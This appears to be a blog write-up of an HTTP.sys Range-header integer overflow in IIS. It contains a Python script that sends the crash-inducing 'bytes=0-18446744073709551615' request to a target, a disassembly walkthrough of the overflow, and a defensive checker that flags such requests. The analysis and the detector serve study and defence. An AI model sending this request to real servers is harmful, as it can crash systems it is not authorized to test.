Going to see the top of the Eiffel Tower
Follow me on Weibo: t.cn/RGSLVUk
At the moment this causes at most a blue screen (BSOD).
POC
import socket
import sys

ipAddr = "WebSite"                      # target host (placeholder kept from the original)
hexAllFfff = "18446744073709551615"     # 0xFFFFFFFFFFFFFFFF, the upper Range offset
count = 0                               # the lower Range offset
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=" + str(count) + "-" + hexAllFfff + "\r\n\r\n"

print("[*] Audit Started")

# First request: a plain GET, only to confirm from the Server header that this is IIS
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1.encode())
boringResp = client_socket.recv(1024).decode(errors="replace")
if "Microsoft" not in boringResp:
    print("[*] Not IIS")
    sys.exit(0)
client_socket.close()

# Second request: the oversized Range header; the response text tells patched from unpatched
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req.encode())
goodResp = client_socket.recv(1024).decode(errors="replace")
if "Requested Range Not Satisfiable" in goodResp:
    print("[!!] Looks VULN")
elif " The request has an invalid header name" in goodResp:
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")
    print(goodResp)
client_socket.close()
How the vulnerability works:
When HTTP.sys processes kernel-cached data,
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
eax1 = eax - edi            ; low 32 bits of (offsethigh - offsetlow)
ecx1 = ecx - edx - borrow   ; high 32 bits of (offsethigh - offsetlow), the sbb carries the borrow
RtlULongLongAdd(ecx1:eax1, 1, &result)   ; 64-bit (offsethigh - offsetlow) + 1; esi is the result pointer
Here eax1 and ecx1 come from the offsets parsed out of the HTTP request's
Range: bytes="+offsetlow+"-" + offsethigh+ "\r\n\r\n"
When offsetlow = 0 and offsethigh = 0xFFFFFFFFFFFFFFFF,
the RtlULongLongAdd operation computes
0xFFFFFFFFFFFFFFFF + 0 + 1 = 0, which is an integer overflow.
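The arithmetic described above, modelled in Python as an added example (not code from the original post): a simplified model of the RtlULongLongAdd contract (success flag plus 64-bit result), the wrapping length the vulnerable path effectively ends up with, and a small checker that flags Range headers whose (offsethigh - offsetlow) + 1 overflows 64 bits. The sample requests are constructed for this example.

```python
import re

U64_MAX = 0xFFFFFFFFFFFFFFFF
RANGE_RE = re.compile(rb"^Range:[ \t]*bytes=([^\r\n]+)", re.IGNORECASE | re.MULTILINE)
PAIR_RE = re.compile(rb"\s*(\d+)-(\d+)\s*")


def rtl_ulonglong_add(augend, addend):
    """Assumed, simplified model of RtlULongLongAdd: returns (ok, result).
    ok is False when the 64-bit sum wraps; a caller that ignores ok keeps a bogus value."""
    total = augend + addend
    if total > U64_MAX:
        return False, U64_MAX          # overflow: the status must be checked by the caller
    return True, total


def range_length_unchecked(offsetlow, offsethigh):
    """(offsethigh - offsetlow) + 1 in wrapping 64-bit arithmetic, i.e. what the
    sub/sbb pair plus an unchecked add produce. For 0 and 0xFFFFFFFFFFFFFFFF this is 0."""
    return (((offsethigh - offsetlow) & U64_MAX) + 1) & U64_MAX


def suspicious_ranges(raw_request):
    """Return the (low, high) pairs of a request's Range header whose length
    computation overflows 64 bits, the condition the analysis above describes."""
    m = RANGE_RE.search(raw_request)
    if not m:
        return []
    hits = []
    for spec in m.group(1).split(b","):
        pair = PAIR_RE.fullmatch(spec)
        if not pair:
            continue                    # suffix ("-500") or open ("500-") ranges are not this case
        low, high = int(pair.group(1)), int(pair.group(2))
        if high > U64_MAX:              # does not even fit a ULONGLONG; treat as suspicious
            hits.append((low, high))
            continue
        ok, _ = rtl_ulonglong_add((high - low) & U64_MAX, 1)   # unsigned wrap, as sub/sbb do
        if not ok:
            hits.append((low, high))
    return hits


SAMPLE_REQUESTS = [  # constructed sample traffic for this example
    b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-1023\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    b"GET /a.png HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-99,0-18446744073709551615\r\n\r\n",
]


def flagged_requests(requests=SAMPLE_REQUESTS):
    """Indices of the sample requests that carry an overflowing range."""
    return [i for i, r in enumerate(requests) if suspicious_ranges(r)]
```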